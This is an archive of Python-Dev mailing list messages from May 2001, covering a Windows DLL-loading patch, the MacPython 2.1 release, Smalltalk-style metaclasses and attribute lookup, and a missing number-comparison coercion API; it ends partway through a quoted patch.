From MarkH@ActiveState.com Tue May 1 01:42:19 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. 
If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas@xs4all.net Tue May 1 09:07:48 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Tue May 1 11:30:57 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... 
> > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can sometimes not work correctly unless the absolute > + path is used. 
If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Tue May 1 22:22:11 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a problem with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API, PyNumber_Compare(), which knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack@oratrix.nl Tue May 1 22:23:59 2001 From: jack@oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications.
MacPython offers a lot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, Unix-compatible CGI scripting, image-manipulation libraries, numerical libraries, Tk-based machine-independent windowing and lots more. Uniquely among Pythons, it also allows you to create fully self-contained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so it runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBEdit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig@python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido@digicool.com Wed May 2 01:52:29 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But, (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "<type 'dictionary'>". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalk's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh.
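The tie-break proposed above can be sketched in modern Python so that it actually runs. This is only an illustration under stated assumptions: `resolve_class_attr`, `Meta` and `Demo` are hypothetical names, only the class's own `__dict__` and its metatype's own `__dict__` are consulted (no walk over base classes), and `inspect.isroutine()` is one possible reading of "describes a method".

```python
import inspect

_MISSING = object()  # sentinel so attributes whose value is None still count


def resolve_class_attr(cls, name):
    """Hypothetical helper: resolve cls.name with the proposed tie-break.

    Only cls.__dict__ and type(cls).__dict__ are consulted; base classes
    and base metatypes are ignored to keep the sketch small.
    """
    own = cls.__dict__.get(name, _MISSING)          # like DictType.__dict__['foo']
    meta = type(cls).__dict__.get(name, _MISSING)   # like TypeType.__dict__['foo']
    if own is _MISSING and meta is _MISSING:
        raise AttributeError(name)
    if meta is _MISSING:
        return own
    if own is _MISSING:
        return meta
    # Both defined: a method in the class's own dict wins, anything else loses.
    return own if inspect.isroutine(own) else meta


class Meta(type):
    label = "meta-label"

    def describe(cls):
        return "describes the class"


class Demo(metaclass=Meta):
    label = "class-label"

    def describe(self):
        return "describes an instance"


# The method meant for instances wins over the metatype's method...
print(resolve_class_attr(Demo, "describe") is Demo.__dict__["describe"])  # True
# ...but a plain data attribute loses to the metatype's attribute.
print(resolve_class_attr(Demo, "label"))  # meta-label
```

For comparison, ordinary attribute access in present-day Python gives `Demo.label == "class-label"`: there the class's own entry wins unless the metatype supplies a data descriptor, which is a different rule from the one sketched here.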
--Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same way Python does. To illustrate, suppose you have object.method() (using Python-style syntax). The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object", one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object.__class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object).
Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__, namely object.__class__.__class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it is exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: if I have a class Date in Smalltalk and an instance of it referenced by the variable d, I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class.__class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on an object.
All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). 
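A rough Python analogue of this limitation, offered only as a sketch: Python metaclasses stand in for Smalltalk's, and the names `Class`, `ClassBase`, `DateMeta`, `RectangleMeta` and the `...80` classes are made up for the illustration. With one shared metaclass, an application-specific class method such as `currentDate` shows up on every class. Giving each class its own metaclass keeps the method where it belongs.

```python
import datetime


# Smalltalk-76 style: one metaclass shared by every class.
class Class(type):
    def new(cls, *args):
        # 'new' is found on the metaclass and invoked on the class object.
        return cls(*args)

    def currentDate(cls):
        # An application-specific class method must also live here...
        return datetime.date.today()


class Rectangle(metaclass=Class):
    def __init__(self, width=0, height=0):
        self.width = width
        self.height = height


class Date(metaclass=Class):
    pass


# ...so it leaks onto every class, e.g. Rectangle.currentDate().
print(hasattr(Rectangle, "currentDate"))  # True


# Per-class metaclasses: shared behavior in a common base metaclass,
# class-specific behavior in each class's own metaclass.
class ClassBase(type):
    def new(cls, *args):
        return cls(*args)


class DateMeta(ClassBase):
    def currentDate(cls):
        return datetime.date.today()


class RectangleMeta(ClassBase):
    pass


class Date80(metaclass=DateMeta):
    pass


class Rectangle80(metaclass=RectangleMeta):
    def __init__(self, width=0, height=0):
        self.width = width
        self.height = height


print(hasattr(Rectangle80, "currentDate"))  # False
print(isinstance(Date80.currentDate(), datetime.date))  # True
```

As in the Smalltalk description, the metaclass method is not visible from instances: `hasattr(Date80(), "currentDate")` is False, because instance lookup searches `type(instance)` and its bases, not the metaclass.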
In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actual hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class such that when it is instantiated, the instance is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hierarchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass.
All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). 
Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido@digicool.com Wed May 2 02:29:28 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? 
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Wed May 2 01:42:15 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido@digicool.com Wed May 2 02:55:59 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. 
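For illustration, here is a minimal Python-level sketch of the kind of check being agreed to: walk `__all__` and fail with a message that names the module and the offending entry. `check_all` is a hypothetical helper, not the change actually made to the import machinery.

```python
import types


def check_all(module):
    """Return the names in module.__all__, raising a descriptive TypeError
    if any entry is not a string (hypothetical helper)."""
    names = getattr(module, "__all__", None)
    if names is None:
        return []  # no __all__: 'import *' falls back to the public names
    checked = []
    for index, name in enumerate(names):
        if not isinstance(name, str):
            raise TypeError(
                "%s.__all__[%d] must be a string, not %s"
                % (module.__name__, index, type(name).__name__)
            )
        checked.append(name)
    return checked


demo = types.ModuleType("demo")
demo.__all__ = ["spam", 42]
try:
    check_all(demo)
except TypeError as exc:
    print(exc)  # demo.__all__[1] must be a string, not int
```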
--Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Wed May 2 02:22:47 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Wed May 2 03:48:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) 
> > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Wed May 2 03:48:20 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. 
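Greg's transitional pseudo-dict can be approximated in present-day Python with `collections.ChainMap`. Reads look in the instance `__dict__` first, then in each class's `__dict__` along the MRO. Those class dictionaries stand in for the hypothetical `__classdict__`. Writes go to the instance dictionary. `union_view` is a made-up name, and this is only a read-through view, not a replacement for real attribute lookup: it ignores descriptors, `__slots__` and `__getattr__`.

```python
from collections import ChainMap


def union_view(obj):
    """Hypothetical sketch: a pseudo-dict combining the instance __dict__
    with the __dict__ of every class on type(obj).__mro__."""
    class_dicts = [vars(klass) for klass in type(obj).__mro__]
    # ChainMap searches its maps in order and sends writes to the first one,
    # which here is the real instance dictionary.
    return ChainMap(vars(obj), *class_dicts)


class Base:
    greeting = "hello"  # class variable used as an instance default

    def greet(self):
        return self.greeting


class Child(Base):
    pass


c = Child()
view = union_view(c)
print(view["greeting"])           # hello  (found in Base.__dict__)
view["greeting"] = "hi"           # stored in c.__dict__, shadowing the default
print(c.greeting, Base.greeting)  # hi hello
print("greet" in view)            # True
```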
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From mal@lemburg.com Wed May 2 08:59:03 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > probelm with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as separate API was to simply shift out code from PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight ? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons. 
So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). 
